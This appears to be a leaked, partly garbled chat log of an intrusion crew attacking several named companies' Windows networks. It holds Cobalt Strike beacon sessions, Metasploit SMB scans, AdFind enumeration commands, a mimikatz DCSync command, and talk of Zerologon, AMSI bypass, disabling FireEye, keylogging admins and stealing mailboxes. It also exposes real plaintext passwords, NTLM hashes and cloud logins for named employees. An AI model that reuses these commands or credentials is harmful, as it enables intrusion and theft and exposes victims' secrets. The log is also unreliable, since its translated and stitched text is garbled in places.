``` most likely a laptop Teemo[ATSALES_RL_LAP]SYSTEM */12676|2021Jan29 20:44:02> shell dir C:\Users [*] Tasked beacon to run: dir C:\Users [+] host called home, sent: 43 bytes [+] received output: Volume in drive C is Windows Volume Serial Number is 2C89-5747 Directory of C:\Users 11/10/2020 06:41 PM . 11/10/2020 06:41 PM . 
11/10/2020 07:03 PM administrator 11/10/2020 06:55 PM administrator.AT 11/10/2020 06:56 PM administrator.AT.000 11/10/2020 06:57 PM administrator.ATSALES_RL_LAP 11/10/2020 06:54 PM Barfield 11/10/2020 06:58 PM LogMeInRemoteUser 11/10/2020 07:32 PM Public 11/10/2020 06:56 PM RLAWRENCE 11/10/2020 06:58 PM rlawrence.AT 01/27/2021 01:44 PM rlawrence.ATSALES_RL_LAP 0 File(s) 0 bytes 12 Dir(s) 847,083,728,896 bytes free ``` well the domain users go to this machine Don't you see? Teemo[ATSALES_RL_LAP]SYSTEM */12676|2021Jan29 20:41:44> shell net localgroup Administrators [*] Tasked beacon to run: net localgroup Administrators [+] host called home, sent: 60 bytes [+] received output: Alias name Administrators Comment Administrators have complete and unrestricted access to the computer/domain Members ------------------------------------------------------------------------------- Administrator Barfield rlawrence The command completed successfully. The ``session is off again only the shortcut leading to the file I searched in uninfo did not remove because the domain was not available barfieldinc.com`` By the time I checked all the links, the grid fell off (my mistake, ``barfieldinc.com`` their domain once putting the scan. 
beacon> shell net use \\10.100.7.16\c$ 1969C00p3r /user:Administrator [*] Tasked beacon to run: net use \\10.100.7.16\c$ 1969C00p3r /user:Administrator [+] host called home, sent: 86 bytes [+] received output: System error 86 has occurred. The specified network password is not correct. beacon> shell net use \\10.100.7.16\c$ consolidate_16 /user:Administrator [*] Tasked beacon to run: net use \\10.100.7.16\c$ consolidate_16 /user:Administrator [+] host called home, sent: 90 bytes [+] received output: System error 86 has occurred. The specified network password is not correct. ``Wouldn't lock)`` well try LA daaaa might try these accounts on cmb login Administrator:1969C00p3r Administrator:consolidate_16 Either there are other enters or the admin passwords are different and there is no overlap I removed all the current entrant domains? did it work? entrants and vmi service local admins on dc PDC Alias name administrators Comment Members can fully administer the computer/domain Members ------------------------------------------------------------------------------- Administrator DEN-DCON-01$ Domain Admins PVRT\Enterprise Admins PVRT\wmi.service ============================================= `````` DEN-DCON-02.na.panavision.com [DS] Site: Denver DEN-DCON-01.na.panavision.com [PDC] [DS] Site: Denver WDH-DCON-02.na.panavision.com [DS] Site: Woodland-Hills The command completed successfully ============================================= PDC Alias name administrators Comment Members can fully administer the computer/domain Members ------------------------------------------------------------------------------- Administrator DEN-DCON-01$ Domain Admins PVRT\Enterprise Admins PVRT\wmi.service ============================================= Group name Domain Admins Comment Designated administrators of the domain Members ------------------------------------------------------------------------------- #yromero adfs.admin Administrator BackupMgr CZambrana_da exponential it.deploy 
it.inventory jharris_da mpatterson_ea orivera_da PKooiman_da sanadmin SP_Admin SQLAgent windchilladmin yromero_ea pvna\#yromero V@ndals1974 ============================================= ``emmmm``. beacon> shell ping -n 1 panavision.com [*] Tasked beacon to run: ping -n 1 panavision.com [+] host called home, sent: 55 bytes [+] received output: Pinging panavision.com [10.100.7.16] with 32 bytes of data: Reply from 10.100.7.16: bytes=32 time<1ms TTL=126 Ping statistics for 10.100.7.16: Packets: Sent = 1, Received = 1, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 0ms, Maximum = 0ms, Average = 0ms ``Is this the right domain? msf6 auxiliary(scanner/smb/smb_version) > run [*] 10.100.7.16:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:required) (uptime:3d 11h 49m 56s) (guid:{1466eec3-53c0-4eb4-af7e-1dabe2584051}) (authentication domain:PVRT) [+] 10.100.7.16:445 - Host is running Windows 2016 Standard (build:14393) (name:GBL-DCON-02) (authentication domain:PVRT) [*] 10.100.7.16: - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed i have not touched it since arma did you scan through the smb version? where is this theory?)) i thought that the visibility of dns is analogous to trastan so what's the problem? it seems all seeSYD-WSUS-01 DNS Suffix Search List ... . : ap.panavision.com na.panavision.com panavision.com eu.panavision.com sa.panavision.com ``scan now put aa here no common YES as far as I remembertry to try there the crosses YES with "that" domain find there carsnado scan on smb_version ranges all just these cars "see" domains strange some why the fuck should the DNS give a trust? 
dude, i don't fucking get it dn:CN=PANAVISION,CN=System,DC=panavision,DC=com >whenCreated:2005/09/15-00:51:44 GMT Daylight Time >name: PANAVISION >securityIdentifier: S-1-5-21-202912000-196093339-1136263860 >trustDirection: 3 [Inbound(1);Outbound(2) >trustPartner: PANAVISION >trustType: 1 [Downlevel(1) >trustAttributes: 4 [Quarantined-Domain(4)] ``or a stopbrain and it's really a trusted one here''. dn:CN=panavision.com,CN=System,DC=ap,DC=panavision,DC=com >whenCreated: 2006/01/16-23:54:35 GMT Daylight Time >name: panavision.com >securityIdentifier: S-1-5-21-4133310860-2374335328-2948649967 >trustDirection: 3 [Inbound(1);Outbound(2) >trustPartner: panavision.com >trustType: 2 [UpLevel(2) >trustAttributes: 32 [Within-Forest(32)] Surely they have a trusted dns, i.e. it communicates with a quarantined domain. DNS Suffix Search List. . . . : ap.panavision.com na.panavision.com panavision.com eu.panavision.com sa.panavision.com ``There's a subnet of the quarantined domain from EUR-DCON-01''. Pinging panavision.com [10.100.7.16] with 32 bytes of data: ``Do you see? beacon> shell ipconfig /all [*] Tasked beacon to run: ipconfig /all [+] host called home, sent: 44 bytes [+] received output: Windows IP Configuration Host Name . . . . . AUS-DCON-01. Primary Dns Suffix . . . . .: ap.panavision.com Node Type . . . . . .: Hybrid IP Routing Enabled . . . . .: No WINS Proxy Enabled. .: No DNS Suffix Search List. . . panavision.com na.panavision.com panavision.com eu.panavision.com sa.panavision.com ``Need''. 
Host Name: EUR-WSUS-16 OS Name: Microsoft Windows Server 2016 Standard OS Version: 10.0.14393 N/A Build 14393 OS Manufacturer: Microsoft Corporation OS Configuration: Member Server OS Build Type: Multiprocessor Free Registered Owner: Windows User Registered Organization: Product ID: 00377-60000-00000-AA934 Original Install Date: 10/4/2018, 4:40:38 PM System Boot Time: 9/12/2020, 7:25:46 PM System Manufacturer: Microsoft Corporation System Model: Virtual Machine System Type: x64-based PC Processor(s): 1 Processor(s) Installed. [01]: Intel64 Family 6 Model 79 Stepping 1 GenuineIntel ~2400 Mhz BIOS Version: Microsoft Corporation Hyper-V UEFI Release v1.0, 11/26/2012 Windows Directory: C:\Windows System Directory: C:{Windows\system32 Boot Device: \Device\HarddiskVolume2 System Locale: en-gb;English (United Kingdom) Input Locale: en-gb;English (United Kingdom) Time Zone: (UTC+00:00) Dublin, Edinburgh, Lisbon, London Total Physical Memory: 8.095 MB Available Physical Memory: 4,448 MB Virtual Memory: Max Size: 9.375 MB Virtual Memory: Available: 5,468 MB Virtual Memory: In Use: 3,907 MB Page File Location(s): C:\pagefile.sys Domain: eu.panavision.com Logon Server: N/A Hotfix(s): 18 Hotfix(s) Installed. [01]: KB3192137 [02]: KB4091664 [03]: KB4132216 [04]: KB4465659 [05]: KB4485447 [06]: KB4498947 [07]: KB4503537 [08]: KB4509091 [09]: KB4512574 [10]: KB4520724 [11]: KB4521858 [12]: KB4524244 [13]: KB4540723 [14]: KB4550994 [15]: KB4562561 [16]: KB4565912 [17]: KB4576750 [18]: KB4577015 Network Card(s): 1 NIC(s) Installed. [01]: Microsoft Hyper-V Network Adapter Connection Name: Ethernet DHCP Enabled: Yes DHCP Server: 10.32.1.41 IP address(es) [01]: 192.168.33.101 [02]: fe80::f831:9a12:366d:1ed6 Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed. 
And in ipconfig? Here is the whole systeminfo output:

```
[01]: Microsoft Hyper-V Network Adapter
      Connection Name: Ethernet
      DHCP Enabled:    Yes
      DHCP Server:     10.32.1.41
      IP address(es)
      [01]: 192.168.33.101
      [02]: fe80::f831:9a12:366d:1ed6
```

```
[01]: Microsoft Hyper-V Network Adapter
      Connection Name: Ethernet
      DHCP Enabled:    No
      IP address(es)
      [01]: 192.168.1.85
      [02]: fe80::188e:a234:ce85:3eb7
```

If you want I can give you access and you can poke at it yourself, but the funny thing is that its own payload gets detected as malware))) Basically the point of it is that it bypasses AMSI and lets you run modules like mimikatz through it.
And how is it, by the way?
I just took a quick look at systeminfo, that porahabka [sic].
How else would I pull the DNS, I wonder?)
And that's why I told you: there is no dns folder, and no utilities either)
Where there is no DNS server?))))
You can't pull DNS records, logically. You know, you said to pull the DNS, that's all I know about it)
And look at who logged into the server (if anyone from other domains was there, it will be visible) and see what DNS they use, damn)
Do systeminfo. What are you trying to dump?) These aren't DNS servers.
What the fuck are you doing? What do we do now?
The DNS folder is nowhere, and dnscmd isn't in system32 either:

```
beacon> shell dnscmd /enumzones > AllZones.txt
[*] Tasked beacon to run: dnscmd /enumzones > AllZones.txt
[+] host called home, sent: 63 bytes
[+] received output:
'dnscmd' is not recognized as an internal or external command,
operable program or batch file.
```

```
beacon> shell dir C:\windows\system32\dns
[*] Tasked beacon to run: dir C:\windows\system32\dns
[+] host called home, sent: 58 bytes
[+] received output:
 Volume in drive C has no label.
 Volume Serial Number is 5C94-6AB3

 Directory of C:\windows\system32

File Not Found
```

Well, if it gets killed through services, you can do it in bulk with a batch file, but as you understand you have to turn it off on every PC, and it gets killed through services... You have to find the firewall...

```
Pinging EUR-WSUS-16.eu.panavision.com [192.168.33.101] with 32 bytes of data:
Reply from 192.168.33.101: bytes=32 time=157ms TTL=251

Ping statistics for 192.168.33.101:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 157ms, Maximum = 157ms, Average = 157ms

Pinging SYD-WSUS-01.ap.panavision.com [192.168.1.85] with 32 bytes of data:
Reply from 192.168.1.85: bytes=32 time=204ms TTL=251

Ping statistics for 192.168.1.85:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 204ms, Maximum = 204ms, Average = 204ms
```

Even so, another WSUS is alive.

```
Pinging AUB-WSUS-16.eu.panavision.com [172.16.1.120] with 32 bytes of data:
Reply from 66.45.62.99: Destination net unreachable.

Ping statistics for 172.16.1.120:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),

[+] received output:
Pinging EUR-WSUS-16.eu.panavision.com [192.168.33.101] with 32 bytes of data:
Reply from 192.168.33.101: bytes=32 time=157ms TTL=251

Ping statistics for 192.168.33.101:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 157ms, Maximum = 157ms, Average = 157ms
```

The genuine xagt.exe file is a software component of FireEye Endpoint Security by FireEye. FireEye Endpoint Security is a single-agent security solution that protects endpoint systems from online threats. Xagt.exe runs a core process associated with FireEye Endpoint Security. Disabling this process may cause issues with this program.

If my English were any worse than zero, I'd translate that as "burning ass". So FireEye is a thing.
> Sage AUB-SAGE-16, by the way.
What about the AV on the network?
Let's see what's on it.
ahahahahah) ahahahahahahaha it's working

```
Pinging SYD-WSUS-01.ap.panavision.com [192.168.1.85] with 32 bytes of data:
Reply from 192.168.1.85: bytes=32 time=204ms TTL=251

Ping statistics for 192.168.1.85:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 204ms, Maximum = 204ms, Average = 204ms
```

I wonder if there is no WSUS other than the one that doesn't exist.
That's the WSUS.

```
beacon> shell ping -n 1 SYD-WSUS-01
[*] Tasked beacon to run: ping -n 1 SYD-WSUS-01
```

There is hope) 1 for 4 domains... so maybe it's under a different name.

```
beacon> shell ping -n 1 DEN-SCCM-01
[*] Tasked beacon to run: ping -n 1 DEN-SCCM-01
beacon> shell ping -n 1 DEN-WSUS-01
[*] Tasked beacon to run: ping -n 1 DEN-WSUS-01
[+] host called home, sent: 104 bytes
[+] received output:
Ping request could not find host DEN-SCCM-01. Please check the name and try again.
[+] received output:
Ping request could not find host DEN-WSUS-01. Please check the name and try again.
```

```
dn:CN=DEN-WSUS-01,OU=Disabled Computers,DC=na,DC=panavision,DC=com
dn:CN=DEN-SCCM-01,OU=Disabled Servers,DC=na,DC=panavision,DC=com
```

This one is just labeled WSUS.
Who? The WSUS server?
Can it somehow be picked out from the AD computers? lol)
ok
Right, so can 1 server be the single WSUS for multiple domains? Including the quarantined one?
SCCM / WSUS servers, often under different hostnames, are present in all domains of the forest.
Yes. So WSUS will be a trusted server, since it sees the DNS server.
Quarantine? Not sure how?
Can they see the quarantined domain from all the current domains? No idea how?
Have to look for a way in... no problem.

```
dn:CN=PANAVISION,CN=System,DC=panavision,DC=com
>whenCreated: 2005/09/14-16:51:44 Pacific Daylight Time
>name: PANAVISION
>securityIdentifier: S-1-5-21-202912000-196093339-1136263860
>trustDirection: 3 [Inbound(1);Outbound(2)]
>trustPartner: PANAVISION
>trustType: 1 [Downlevel(1)]
>trustAttributes: 4 [Quarantined-Domain(4)]
```

What's the name of the quarantined domain again?
eu.panavision.com

=================
> Domain Controller
AUB-DCON-01
PRK-DCON-01
PRK-DCON-02
GFD-DCON-01
GFD-DCON-02
EUR-DCON-01
GFD-DCON-16
--------------------
> File Servers
PRA-FILE-01
PRK-FILE-01
AUB-FILE-01
AUB-FILE-02
GFD-FILE-01
AUB-FILE-04
FR-SPARESERVER
MAN-FILE-02
PRV-FILE-02
WTL-FILE-02
--------------------
> Sage
AUB-SAGE-16
--------------------
> SQL
PA-SDS-01
EUR-DOMS-01
EUR-ACMS-01
EUR-MSQL-14
AUB-WEB-01
GFD-ACMS-02
PA-INTB-01
PRK-ITMS-01
--------------------
> UAG Server
EUR-FUAG-01
--------------------
> Insphire Server
EUR-INSP-01
--------------------
> Hyper-V
AUB-HYPV-01
AUB-HYPV-01
AUB-HYPV-02
GFD-HYPV-05
GFD-HYPV-06
AUB-HYPV-04
PRK-HYPV-03
--------------------
> Remote Desktop Services Server/Credit Host
EUR-RDS-04
EUR-RDSH-08
EUR-MRDS-01
EUR-RDSB-01
EUR-RDSH-01
EUR-RDSH-02
EUR-RDSH-03
EUR-RDSH-04
EUR-RDSH-05
EUR-RDSB-02
EUR-RDSB-03
EUR-RDSH-06
EUR-RDSH-07
--------------------
> Interbase Database Server
GBL-INTR-01
GBL-INTR-02
--------------------
> WSUS
AUB-WSUS-16
EUR-WSUS-16
--------------------
> Terminal Server License Servers
EUR-LHPV-01
EUR-LHPV-02
EUR-LHPV-03
--------------------
> ATS Server
PA-PRTSVR
--------------------
> Disabled Computers
PRK-SRCE-01
PRK-BUILD-01
PRK-CBLD-01
PRK-CSYS-01
PRK-CVCS-01
PRK-HPV-01
EUR-LRAH-01
EUR-LRAH-02
EUR-DCON-02
--------------------
> Failover cluster virtual network name account
PRK-CLST-12
GDF-CLST-01
--------------------
> Lexicon (Web Hosting, eCommerce Solutions, Peace of Mind. LexiConn provides personal service, expert, in-house support, and rock solid hosting solutions designed to grow and evolve with the needs of your business)
EUR-LRAH-03
EUR-LRCB-01
EUR-LRAH-04
EUR-LRAH-05
--------------------
> Unavailable
EUR-LEE-01
EUR-LEE-02
EUR-LEE-03
EUR-LEE-04
EUR-MDPM-01
GFD-CORESRV-01
--------------------
> w3wp
EUR-LREP-01
EUR-LSRV-02
EUR-LSRV-06
EUR-LSRV-07
EUR-LSRV-08
EUR-LSRV-09
--------------------
> PDQ
EUR-ITMS-12
--------------------
???
AT-SRV-APPS-1
EUR-CSYS-01
EUR-CVCS-01
GFD-ALCT-01

Ask the colleagues, did they find it there on my PC? And it's only the checker.
Found the checker, but it only checks 1 IP at a time, I haven't checked)
Did SMBGhost go through?
My last hope is Zerologon (which didn't get patched after the last attempt lol).
To pull a DCSync you have to make the token via PtH, but since there is no SYSTEM, no way.

```
mimikatz lsadump::dcsync /dc:SS-Data2.Austin.SilencerShop.com /user:SilencerShop\krbtgt /authuser:SS-DATA2$ /authdomain:. /authpassword:"" /authntlm
```

This line doesn't seem to work because CS has an old mimikatz, and the new version can't be put on the machine because it gets flagged as a virus.
We only have one valid user who works over SMB on 10.7.20.30, and who knows what kind of machine that is (he is a local user there).
If you pulled ad_users.txt, I take it you have logins))
Only logins.
Found.
YES.
Without passwords.
Found = login and password are valid.
Login.
YES.
We can't get into the domain.
Found (found their logins).
I.e. all right, still looking.
YES.
Connected to the VPN.
So you are not connected to the VPN?
Via a local one) Or what network are you moving around on?
Checked the local admins, accounts.
YES, to the passwords found.
> brought up the VPN, walk around the network through our dedicated server
Am I reading this phrase wrong?
Found the domain, not connected.
Did you find any passwords for SMB admin?
> brought up the VPN, through our dedi, walk the network, see what's there, scan for MS17
How's it going?
[+] 10.7.20.30:445 - 10.7.20.30:445 - Success: 'WORKSTATION\Louisad:M@tches2020! ``description ``` Prod App read only (Matches2014) - prodappread Test account for app pw matches123 - ipadvpn iTunes Account for Richmond stores (Matches123) - richapp ``DA''. LDAP_SEARCH_S: 0x34 LDAP_SEARCH_S: Unavailable ERROR: Couldn't gather RootDSE Info... Terminating program. `````` adfind.exe -f "(objectcategory=person)" -h 10.1.4.30 > ad_users.txt adfind.exe -f "objectcategory=computer" -h 10.1.4.30 > ad_computers.txt adfind.exe -f "(objectcategory=organizationalUnit)" -h 10.1.4.30 > ad_ous.txt adfind.exe -subnets -f (objectCategory=subnet) -h 10.1.4.30 > subnets.txt adfind.exe -f "(objectcategory=group)" -h 10.1.4.30 > ad_group.txt adfind.exe -gcb -sc trustdmp -h 10.1.4.30 > trustdmp.txt ``This does not exist in the domain and you are trying to make queries to the DC from a forbidden pk. The reason is that you cannot remove the AD because your pk is in a vorkgroupdid you raise the vpn there? Directory of C:\users\Administrator\Desktop 09/28/2020 03:23 PM . 09/28/2020 03:23 PM . 
09/28/2020 03:24 PM 391 ad.bat 09/28/2020 03:22 PM 1,394,176 adFind.exe 09/28/2020 01:55 PM 4,554 io.xml 09/23/2020 12:33 PM 303,098 kali-linux-2020.3-installer-amd64.iso.torrent 09/28/2020 02:55 PM 27 LEHA.txt 09/28/2020 01:55 PM 0 New Text Document.txt 09/28/2020 02:12 PM 935 Nmap - Zenmap GUI.lnk 09/28/2020 02:21 PM 7,978 nmap.7z 09/28/2020 02:19 PM 188,255 nmap.xml 09/23/2020 12:32 PM 867 µTorrent.lnk ``Try restarting@tl1 what could it be?``in smb_login Error: 10.20.4.78: Errno::EISDIR Is a directory @ io_fillbuf - fd:52 /home/user/Desktop/cobalt ``[ ](https://mediaeveryone.com/group/matches?msg=bsWTgZB5hY8rthErT) no, but it doesn't find it ====== MappedDrives ====== Mapped Drives (via WMI) LocalName : p: RemoteName : \ho-fs01.matches.com\press RemotePath : \\ho-fs01.matches.com\press Status : Unavailable ConnectionState : Disconnected Persistent : True UserName : Description : RESOURCE REMEMBERED - Microsoft Windows Network LocalName : y: RemoteName : \\HO-FS01.matches.com\department RemotePath : \\HO-FS01.matches.com\department Status : Unavailable ConnectionState : Disconnected Persistent : True UserName : Description : RESOURCE REMEMBERED - Microsoft Windows Network Isn't it empty? ``` Administrator:500:aad3b435b51404eeaad3b435b51404ee:faf5481720d381d2405ef4194ddb4770::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:1a20cb05b4b6db77e592dee4e974e4d9::: `````` Domain : UKHECSLT3028 Login : Administrator Password : 192837465S! NTLM : f490c4823837a7d002e0176f3c5203ad Domain : MATCHES Login : mercedesd Password : Dinham2323 NTLM : 7c839aa54221edb65e959f18ab9bde41 Domain : MATCHES.COM Username : Louisad Password : M@tches2020! NTLM : f74bc7faf8ddfbedb1441e9e42cdbb1c Nice:+ is the VPN up? 
It's ok.
If you want to connect from his PC, he may notice that the VPN is up.
Maybe the installer is on the PC. Look for the domain to connect to; you have the domain creds.
Deploy the VPN on the hard disk.

beacon> shell ipconfig /all
[*] Tasked beacon to run: ipconfig /all
[+] host called home, sent: 44 bytes
[+] received output:

Windows IP Configuration

   Host Name . . . . . . . . . . . . : UKHOEVLT3156
   Primary Dns Suffix  . . . . . . . : matches.com
   Node Type . . . . . . . . . . . . : Mixed
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : matches.com
                                       Home

Ethernet adapter Ethernet 3:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Fortinet SSL VPN Virtual Ethernet Adapter
   Physical Address. . . . . . . . . : 00-09-0F-AA-00-01
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes

Ethernet adapter Ethernet:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : matches.com
   Description . . . . . . . . . . . : Intel(R) Ethernet Connection (6) I219-V
   Physical Address. . . . . . . . . : 00-68-EB-67-1A-A2
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes

Wireless LAN adapter Local Area Connection* 1:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Microsoft Wi-Fi Direct Virtual Adapter
   Physical Address. . . . . . . . . : 04-ED-33-E4-5F-2B
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes

Wireless LAN adapter Local Area Connection* 10:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Microsoft Wi-Fi Direct Virtual Adapter #2
   Physical Address. . . . . . . . . : 06-ED-33-E4-5F-2A
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes

Ethernet adapter Ethernet 2:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Fortinet Virtual Ethernet Adapter (NDIS 6.30)
   Physical Address. . . . . . . . . : 00-09-0F-FE-00-01
   DHCP Enabled. . . . . . . . . . . :
Yes Autoconfiguration Enabled . .: Yes Wireless LAN adapter WiFi: Connection-specific DNS Suffix ... : Home Description . . . . . : Intel(R) Wi-Fi 6 AX200 160MHz Physical Address . . . . : 04-ED-33-E4-5F-2A. DHCP Enabled. . . . .: Yes Autoconfiguration Enabled. .: Yes IPv6 Address. . . . : 2a02:c7d:a28:5100:7de6:b515:bbeb:89c0(Preferred) IPv6 Address. . . . : fdb0:64:3df8:0:7de6:b515:bbeb:89c0(Preferred) Temporary IPv6 Address. . . . : 2a02:c7d:a28:5100:5ce0:5b5c:1236:fc08(Preferred) Temporary IPv6 Address. . . .: fdb0:64:3df8:0:a9ec:ba3a:d314:b55e(Preferred) Link-local IPv6 Address . . . : fe80::7de6:b515:bbeb:89c0%11(Preferred) IPv4 Address . . . . .: 192.168.0.80(Preferred) Subnet Mask . . . : 255.255.255.0 Lease Obtained... on... ♪ Sunday, September 27, 2020 12:33:55 PM ♪ Lease Expires . . . . . : Tuesday, September 29, 2020 9:42:09 AM Default Gateway . . . . ♪ fe80::7e4c:a5ff:fef9:c2a0%11 192.168.0.1 DHCP Server . . . . : 192.168.0.1 DHCPv6 IAID . . . . : 201649459 DHCPv6 Client DUID . . . . : 00-01-00-01-25-72-B4-85-00-68-EB-67-1A-A2 DNS Servers . . . . . : fdb0:64:3df8:0:7e4c:a5ff:fef9:c2a0 192.168.0.1 NetBIOS over Tcpip. . . . .: Enabled ````UKHOEVLT3156\Administrator faf5481720d381d2405ef4194ddb4770``MATCHES.COM\Louisad M@tches2020!!`! URL : https://login.microsoftonline.com/common/login Username : louisa.davies@matchesfashion.com Password : Basil1234 ``` ``most likely domain kredes.there is a sessionbii pizda)morally i'm with you guys) and optimize the actions to reduce unnecessary and uselessnu finalize / reprocess all the hodgepodge that i have on my hard drive from the "working" roughly related to the development of a full-authored tulkit that we saw now do a channel one thematic can for half an hour will be distracted for a small discussion, and you guys are all here now? 
Project the logic laid down in the OUs and groups onto the results of scans from different points. Try to understand the logic of where the "hardware" that blocks the ports sits: it can be by physical location, by functional purpose, "by department", or just a box between the server and user segments. Often these networks have many DCs and the subnets are isolated from each other, but never from the domain controllers (replication has to work), and almost never from the "tech machine". They put the phasers [sic] on the segments and look for a route.
The correct solution is administration of the network firewalls that forbid incoming connections, and it's not certain it will let anything through anyway. But this will hardly work, because NTLM relay in its current state can only "hit" a machine other than the one the connection was initiated from. Spoof something, not just to make it work, but to make the authorization come from this machine.
All the ports are closed? All the ports?
But we were able to get into the session.
In the "outgoing" session?
I have a question: why not do a bind?
Not yet.
Work in the ones that were, but if there are new ones, wait for a)
Nowhere? There isn't. Yes, where? Yes?
2 networks close to a dead end; is there anything there to work on?
Long.
How are you?
Hello.
Today the deadline is still an hour away; prepare. Lack of data; tomorrow by lunch.
So I need to go away on business. I understand there is something to do; write, and if I can help with a suggestion I will definitely tell you when I return.
https://www.stellarinfo.com/blog/exchange-mailbox-backup-using-powershell-cmdlets/
So, have a couple of nominal techs pull a couple of .pst files and... hmm, no clue...
I usually just downloaded the target mailboxes through EAC.
@tl2 question on >3) a backup of the mail server: so I had a server named `Exchange.rtpco.local`, I go to `C:\Program Files\Microsoft\Exchange Server\V15\Mailbox` and download that.
Here.
FF twitches; Chromium won't decrypt without the master key.
Support the browsers on the admins' machines carefully, without Cobalt sessions.
Carbon is a fact; well, they also don't have Exchange, I need to look for mail.
On #evo-com everything is ready there except two NAS boxes in the workgroup; they should look in the admins' browsers. We have only looked at FS and FF there, since we have not jumped anywhere on the machines and worked from the dedi over the VPN. Carbon sees everything, so if we jump somewhere the countdown starts and it has to be closed the same day. And the time there is -11, so we have to start somewhere around 9-10 in the morning.
Today in general the three-ton idea hasn't come to me yet. @user3 and @user9 seem to be working on this network on #evo-com.
How's it going?
Hi. On #rtpcompany-com found a bunch of ESXi hosts that they didn't find last time, and the creds for them; kind of left to finish the additional tasks (SQL, Exchange, etc.). On #waterway-com I haven't picked up the creds for the Nimbles; they seem to really pass them around on a piece of paper. The IT guys are keylogged; one of them tried on Friday and couldn't get into the Nimbles, then went to LastPass and locked himself out there.
Tell me what progress there was at the end of last week on the current tasks.
@tl1 is out today, so I'm standing in for everyone.
Hello.
Dani, can't get through?
So far, have you given up on this network?
`USIDgfs867gfusydkGTTKJUg`
Ready to build?
Coba, then shoot. + I think about 3 more to review the network, and then you can already start, then close today.
Nah, in vim, not connected.
No software solutions besides vim? What about clouds?
We don't need it that much.
Look at all the hosts?
We found two, and in the vim backup also two.
Subnets scanned; there is no hint of the control center. `TESTLAB-PACKV9`, but it can't be reached at all.
Came across these machines:

```
TEST044-R002V9
TEST044-R002
```

I think there is a way for Linux... is there any way to tell from a guest machine which host it runs on?
https://10.69.0.51/restgui/start.html
In general there seems to be no Hyper-V host control center, only two hosts; there are 34 virtual machines running on them, and that's roughly half of them. AD has 76 servers, haven't pinged yet, but it feels like not many are alive.
They back up to a DiskStation (10.69.0.22), mainly the file dump and sometimes servers. I can't see any other backups yet.
http://10.69.0.90:5000/
As usual)
Already figured it out, only looked at `Packets: Sent = 4, Received = 4, Lost = 0 (0% loss)`, so it doesn't exist: `Reply from 10.69.201.15: Destination host unreachable.`

```
beacon> shell ping 10.69.201.21
[*] Tasked beacon to run: ping 10.69.201.21
[+] host called home, sent: 49 bytes
[+] received output:

Pinging 10.69.201.21 with 32 bytes of data:
Reply from 10.69.201.15: Destination host unreachable.
Reply from 10.69.201.15: Destination host unreachable.
Reply from 10.69.201.15: Destination host unreachable.

[+] received output:
Reply from 10.69.201.15: Destination host unreachable.

Ping statistics for 10.69.201.21:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
```

From the same subnet.

```
beacon> shell ping -n 1 10.69.201.21
[*] Tasked beacon to run: ping -n 1 10.69.201.21
[+] host called home, sent: 53 bytes
[+] received output:

Pinging 10.69.201.21 with 32 bytes of data:
Reply from 10.69.201.15: Destination host unreachable.

Ping statistics for 10.69.201.21:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
```

And where are you pinging from? Note who the ping reply comes from.
Then what's the point of the port scan?)
Yes.
Didn't understand the question?
Will telnet show that port 22 is open if you telnet server_name 22?

```
beacon> portscan 10.69.201.21 445,443,5000 icmp 1024
[*] Tasked beacon to scan ports 445,443,5000 on 10.69.201.21
[+] host called home, sent: 93285 bytes
[+] received output:
Scanner module is complete

beacon> portscan 10.69.201.21 22 icmp 1024
[*] Tasked beacon to scan ports 22 on 10.69.201.21
[+] host called home, sent: 93285 bytes
[+] received output:
Scanner module is complete

beacon> portscan 10.69.201.21 80 icmp 1024
[*] Tasked beacon to scan ports 80 on 10.69.201.21
[+] host called home, sent: 93285 bytes
[+] received output:
Scanner module is complete

beacon> portscan 10.69.201.21 1-1000 icmp 1024
[*] Tasked beacon to scan ports 1-1000 on 10.69.201.21
[+] host called home, sent: 93285 bytes
[+] received output:
Scanner module is complete

beacon> portscan 10.69.201.21 1001-5000 icmp 1024
[*] Tasked beacon to scan ports 1001-5000 on 10.69.201.21
[+] host called home, sent: 93285 bytes
[+] received output:
Scanner module is complete

beacon> portscan 10.69.201.21 5001-10000 icmp 1024
[*] Tasked beacon to scan ports 5001-10000 on 10.69.201.21
[+] host called home, sent: 93285 bytes
[+] received output:
Scanner module is complete
```

Give the answer to the ping. Is 22 open for telnet?)
I don't remember how I did it; in my case there is no ping on the IP.
